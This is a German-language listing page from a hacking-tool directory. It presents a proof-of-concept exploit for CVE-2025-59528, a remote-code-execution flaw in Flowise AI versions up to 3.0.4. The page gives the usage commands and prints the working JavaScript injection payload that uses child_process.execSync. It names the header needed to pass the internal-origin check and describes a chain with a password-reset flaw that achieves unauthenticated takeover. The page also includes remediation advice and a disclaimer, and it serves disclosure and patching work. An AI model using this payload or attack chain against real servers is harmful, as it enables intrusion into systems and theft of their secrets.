Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Flowise-RCE-CVE-2025-59528 — Python-PoC-Exploit für CVE-2025-59528, das authentifizierte RCE auf Flowise AI <= 3.0.4 über den customMCP-Endpunkt und Node.js child_process.execSync erreicht. | Kitploit
Tools/GitHubGitHub/arensballiu/flowise-rce-cve-2025-59528
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubarensballiu/flowise-rce-cve-2025-59528

Flowise-RCE-CVE-2025-59528

Python-PoC-Exploit für CVE-2025-59528, das authentifizierte RCE auf Flowise AI <= 3.0.4 über den customMCP-Endpunkt und Node.js child_process.execSync erreicht.

Repository anzeigen
11vor 4h 37mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-59528 — Flowise AI Authentifizierte Remote-Code-Ausführung (RCE)

Übersicht

CVE-ID: CVE-2025-59528
Betroffene Software: Flowise AI
Verwundbare Versionen: <= 3.0.4
Behobene Version: 3.0.5 und später
Schweregrad: Kritisch
Autor: arensballiu
Datum: 2025

Beschreibung

Flowise AI-Versionen bis einschließlich 3.0.4 ermöglichen es einem authentifizierten Benutzer, Remote-Code-Ausführung (RCE) auf dem Host-Server zu erreichen, indem eine manipulierte JavaScript-Nutzlast an den Endpunkt /api/v1/node-load-method/customMCP gesendet wird.

Die Lade-Methode des customMCP-Knotens akzeptiert benutzergesteuerte Eingaben, die serverseitig als JavaScript ausgewertet werden, ohne ausreichende Bereinigung oder Sandboxing. Durch die Injektion einer Nutzlast, die Node.js' child_process.execSync ausnutzt, kann ein Angreifer beliebige Betriebssystembefehle mit den Rechten des Flowise-Serverprozesses ausführen.

Der Endpunkt erfordert außerdem das Vorhandensein des Headers .

x-request-from: internal

Betroffener Endpunkt

EndpunktMethodeAuthentifizierung erforderlichZweck
/api/v1/auth/loginPOSTNeinAuthentifizieren und Sitzung erhalten
/api/v1/node-load-method/customMCPPOSTJa (Session-Cookie)Verwundbarer Knoten-Lade-Methoden-Endpunkt

Proof of Concept

Datei: CVE-2025-59528_POC.py

Anforderungen

  • Python 3.x
  • requests-Bibliothek
  • Gültige Anmeldedaten für ein beliebiges Benutzerkonto auf der Ziel-Flowise-Instanz
root@kitploit:~
pip install requests

Verwendung

root@kitploit:~
python3 CVE-2025-59528_POC.py -e <email> -i <target_url> -p <password> -c <command>

Argumente

FlagLangformErforderlichBeschreibung
-e--emailJaE-Mail-Adresse des authentifizierten Benutzers
-i--urlJaBasis-URL der Flowise-Instanz
-p--passwordJaPasswort des authentifizierten Benutzers
-c--cmdJaAuf dem Server auszuführender Betriebssystembefehl

Beispiele

Code-Ausführung überprüfen:

root@kitploit:~
python3 CVE-2025-59528_POC.py -e [email protected] -i https://flowise.example.com -p MyP@ss -c "id"

Server-Umgebungsvariablen abrufen:

root@kitploit:~
python3 CVE-2025-59528_POC.py -e [email protected] -i https://flowise.example.com -p MyP@ss -c "env"

Erwartete Ausgabe

root@kitploit:~
[+] Logged in
[+] Exploit sent
[+] Status: 200

Nutzlast-Analyse

Der Exploit injiziert den folgenden JavaScript-Ausdruck in das Feld mcpServerConfig:

root@kitploit:~
({x:(function(){
    const cp = process.mainModule.require('child_process');
    cp.execSync('<command>');
    return 1;
})()})
  • process.mainModule.require('child_process') — lädt das integrierte Prozessausführungsmodul von Node.js.
  • execSync('<command>') — führt den vom Angreifer bereitgestellten Betriebssystembefehl synchron aus.
  • Der gesamte Ausdruck ist in ein Objektliteral eingebettet, um sicherzustellen, dass er im JavaScript-Kontext des Servers sauber ausgewertet wird.

Der Header x-request-from: internal wird ebenfalls an die Anfrage angehängt, um eine interne Ursprungsprüfung zu bestehen, die den Aufruf andernfalls blockieren würde.

Grundursache

Der customMCP-Endpunkt übergibt benutzergesteuerte Eingaben direkt in einen JavaScript-Auswertungskontext auf dem Server, ohne Bereinigung oder Sandboxing. In Kombination mit uneingeschränktem Zugriff auf Node.js-Kernmodule (insbesondere child_process) über process.mainModule.require entsteht ein trivial ausnutzbarer RCE-Vektor. Die x-request-from-Header-Prüfung bietet keine sinnvolle Sicherheitsgrenze, da sie nicht gegen eine vertrauenswürdige Quelle validiert wird.

Verkettung mit CVE-2025-58434

Diese beiden Schwachstellen können für einen unauthentifizierten RCE-Angriffspfad gegen Flowise-Instanzen mit den Versionen <= 3.0.4 verkettet werden:

  1. Verwenden Sie CVE-2025-58434, um das Passwort eines beliebigen bekannten Kontos zurückzusetzen (keine vorherige Authentifizierung erforderlich).
  2. Melden Sie sich mit den neu gesetzten Anmeldedaten an.
  3. Verwenden Sie CVE-2025-59528, um beliebige Betriebssystembefehle auf dem Server auszuführen.

Behebung

  • Aktualisieren Sie auf Flowise AI 3.0.5 oder später, wodurch der verwundbare Auswertungspfad entfernt oder ordnungsgemäß in einer Sandbox isoliert wird.
  • Werten Sie niemals benutzergesteuerte Zeichenketten als Code in einem serverseitigen Kontext aus.
  • Beschränken Sie den Zugriff auf gefährliche Node.js-Module (child_process, fs usw.) durch eine ordnungsgemäße Sandbox (z. B. vm2, isolierte Kontexte oder Entfernen des process.mainModule-Zugriffs).
  • Validieren und authentifizieren Sie den x-request-from-Header durch einen serverseitigen Mechanismus anstelle einer einfachen Zeichenkettenprüfung.
  • Wenden Sie das Prinzip der geringsten Rechte auf den Flowise-Serverprozess an.

Haftungsausschluss

Dieser Proof of Concept wird ausschließlich für Bildungszwecke und autorisierte Sicherheitsforschung bereitgestellt. Die Verwendung dieses Skripts gegen Systeme ohne ausdrückliche schriftliche Genehmigung ist illegal und unethisch. Der Autor und die Mitwirkenden übernehmen keine Haftung für Missbrauch.

Tool herunterladen